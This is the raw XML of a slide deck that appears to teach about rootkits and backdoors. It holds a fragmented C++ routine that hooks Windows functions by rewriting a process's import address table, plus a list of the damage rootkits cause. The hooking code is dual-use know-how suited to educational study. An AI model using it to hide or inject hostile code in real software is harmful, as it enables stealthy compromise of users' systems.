              <a:t>LPVOID IAT::GetCurrentProcessModule()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char lpCurrentModuleName[MAX_PATH];</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char lpImageName[MAX_PATH];</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GetProcessImageFileNameA(GetCurrentProcess(), lpImageName, MAX_PATH);</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MODULEENTRY32 ModuleList{};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ModuleList.dwSize = sizeof(ModuleList);</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const HANDLE hProcList = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, 0);</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(hProcList == INVALID_HANDLE_VALUE)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(!Module32First(hProcList, &amp;ModuleList))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wcstombs_s(nullptr, lpCurrentModuleName, ModuleList.szModule, MAX_PATH);</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lpCurrentModuleName[MAX_PATH - 1] = '\0';</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(StrStrIA(lpImageName, lpCurrentModuleName)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ModuleList.hModule;</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while (Module32Next(hProcList, &amp;ModuleList))</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wcstombs_s(nullptr, lpCurrentModuleName, ModuleList.szModule, MAX_PATH);</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lpCurrentModuleName[MAX_PATH - 1] = '\0';</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if (StrStrIA(lpImageName, lpCurrentModuleName) !=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ModuleList.hModule;</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algn="l">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pP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algn="l">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005 0.0272222 L 0.00505208 -0.808796 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-472"/>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Hook-Direct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矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>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5" name="Text Box 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="82550" y="967740"/>
            <a:ext cx="12027535" cy="10652125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>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Function to hook functions in the IAT of a the main module of the process.</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lpModuleName : name of the module w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ich contains the 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lpFunctionName : name of the function you want to hook.</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\param lpFunction : pointer of the new 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 \return : the pointer of the original function or nullptr if it failed.</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LPVOID IAT::Hook(LPCSTR lpModuleName, LPCSTR lpFunctionName, const LPVOID lpFunction)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const LPVOID hModule = GetCurrentProcessModule(); //Retrieves a pseudo handle for the current process.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lpImageDOSHeader = (PIMAGE_DOS_HEADER)(hModule);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if (lpImageDOSHeader == nullptr)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lpImageNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)lpImageDOSHeader + lpImageDOSHeader-&gt;e_lfanew);//Go to NT header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IMAGE_DATA_DIRECTORY ImportDataDirectory = lpImageNtHeader-&gt;OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];//Go to IMPORT</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lpImageImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD_PTR)hModule + ImportDataDirectory.VirtualAddress); //obtain the virtual address for the Import table</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while (lpImageImportDescriptor-&gt;Characteristics != 0) //check if there are imported functions</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lpCurrentModuleName = (LPSTR)((DWORD_PTR)lpImageDOSHeader + lpImageImportDescriptor-&gt;Name); //dll name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(strcmp(lpCurrentModuleName, lpModuleName) != 0) //check if the lpModuleName is found</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continue;</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lpImageOrgThunkData = (PIMAGE_THUNK_DATA)((DWORD_PTR)lpImageDOSHeader + lpImageImportDescriptor-&gt;OriginalFirstThunk);</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auto lpImageThunkData = (PIMAGE_THUNK_DATA)((DWORD_PTR)lpImageDOSHeader + lpImageImportDescriptor-&gt;FirstThunk);</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while (lpImageOrgThunkData-&gt;u1.AddressOfData != 0)</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lpImportData = (PIMAGE_IMPORT_BY_NAME)((DWORD_PTR)lpImageDOSHeader + lpImageOrgThunkData-&gt;u1.AddressOfData);//Import name table</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(strcmp(lpFunctionName, lpImportData-&gt;Name) == 0)//if the function is found</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DWORD dwJunk = 0;</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MEMORY_BASIC_INFORMATION mbi;</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 //Retrieves information about a range of pages in the virtual address space of the calling process.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VirtualQuery(lpImageThunkData, &amp;mbi, sizeof(MEMORY_BASIC_INFORMATION)); </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PAGE_READWRITE, &amp;mbi.Protect)) //change the memory for the function to be writtable</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const auto lpOrgFunction = (LPVOID)lpImageThunkData-&gt;u1.Function;</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#if defined _M_IX86</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(DWORD_PTR)lpFunction;//replace the function with ours</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#elif defined _M_X64</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lpImageThunkData-&gt;u1.Function = (DWORD_PTR)lpFunction;</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#endif</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r>
              <a:rPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>if (VirtualProtect(mbi.BaseAddress, mbi.RegionSize, mbi.Protect, &amp;dwJunk))//successful</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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lpOrgFunction;</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lpImageThunkData++;</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lpImageOrgThunkData++;</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lpImageImportDescriptor++;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a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pP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	return nullptr;</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304"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0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0 0 L 0.00505208 -0.748981 " pathEditMode="relative" rAng="0" ptsTypes="">
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-394"/>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ldLvl="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Damages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5" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234337d220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="634683" y="2271395"/>
            <a:ext cx="10922635" cy="3810000"/>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Stealth behavior:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Rootkits can hide their presence on a system, making it difficult to detect and remove them.</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Data theft:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Rootkits can steal sensitive information such as passwords, credit card numbers, and other personal information.</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System modification:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Rootkits can modify system files and settings, compromising the security and stability of the system.</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Spreading of malware:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Rootkits can also spread other forms of malware, such as viruses and Trojans, to other systems on a network.</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700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="A728BE"/>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Performance degradation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> The presence of a rootkit can slow down the performance of a system and consume valuable system resources.</a:t>
            </a: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3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="236220" y="1098550"/>
            <a:ext cx="11828780"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71500">
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>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微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>Rootkits can cause a number of significant damages to a computer system or network:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:lnSpc>
                <a:spcPts val="3800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId5"/>
              </a:buBlip>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="-150" checksum="1568234514"/>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微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>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图片 13"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192635" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-2"/>
            <a:ext cx="12191998" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="91765"/>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a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4260850" y="2934653"/>
            <a:ext cx="7908925"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rPr>
              <a:t>Rootkits </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="BF191A"/>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17"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18" name="矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707653" y="-2"/>
            <a:ext cx="3391877" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E13747">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9"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01</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20"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One</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21" name="组合 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1952199" y="2121506"/>
            <a:ext cx="658709" cy="199812"/>
            <a:chOff x="4510429" y="6007426"/>
            <a:chExt cx="658709" cy="199812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="L 形 21"/>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3" name="L 形 22"/>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4" name="L 形 23"/>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5" name="直角三角形 24"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4510429" y="6007426"/>
              <a:ext cx="199812" cy="199812"/>
            </a:xfrm>
            <a:prstGeom prst="rtTriangle">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D1202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26" name="矩形 25"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545426"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27" name="矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4158103" y="-2"/>
            <a:ext cx="101886" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="80000">
                <a:srgbClr val="E13747"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="E13747">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p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192635" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-2"/>
            <a:ext cx="12191998" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF">
              <a:alpha val="91765"/>
            </a:sysClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4278630" y="2934653"/>
            <a:ext cx="7913370" cy="988695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <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rPr>
              <a:t>Backdoor</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="5500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="09DEE9">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6356350"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfr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defRPr/>
            </a:pPr>
            <a:fld id="{74E7442A-BA00-4274-AC47-95D95C23D1C8}" type="datetimeFigureOut">
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707653" y="-2"/>
            <a:ext cx="3391877" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="07A7AF">
              <a:alpha val="9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7" name="文本占位符 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289843" y="3127425"/>
            <a:ext cx="2157413" cy="1695450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="9600" b="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02</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="9600" b="1" i="0"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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本占位符 31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289843" y="2729084"/>
            <a:ext cx="2157413" cy="523631"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2400" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1p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rPr>
              <a:t>Part Two</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1952199" y="2121506"/>
            <a:ext cx="658709" cy="199812"/>
            <a:chOff x="4510429" y="6007426"/>
            <a:chExt cx="658709" cy="199812"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="L 形 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4663956"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1" name="L 形 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4818077" y="6008863"/>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2" name="L 形 11"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4972199" y="6008864"/>
              <a:ext cx="196938" cy="196940"/>
            </a:xfrm>
            <a:prstGeom prst="corner">
              <a:avLst>
                <a:gd name="adj1" fmla="val 19000"/>
                <a:gd name="adj2" fmla="val 19000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>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3" name="直角三角形 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1">
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13500000">
              <a:off x="4510429" y="6007426"/>
              <a:ext cx="199812" cy="199812"/>
            </a:xfrm>
            <a:prstGeom prst="rtTriangle">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="06DCA9">
                <a:lumMod val="50000"/>
              </a:srgbClr>
            </a:soli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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="545426"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
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4158103" y="-2"/>
            <a:ext cx="101886" cy="6858002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="80000">
                <a:srgbClr val="07A7AF"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="07A7AF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gradFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>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0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI" panose="020B0502040204020203"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              <a:cs typeface="+mn-cs"/>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Backdoor</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="754380" y="1788795"/>
            <a:ext cx="10683240" cy="3394710"/>
            <a:chOff x="1188" y="2137"/>
            <a:chExt cx="16824" cy="5346"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="矩形 4"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId1"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
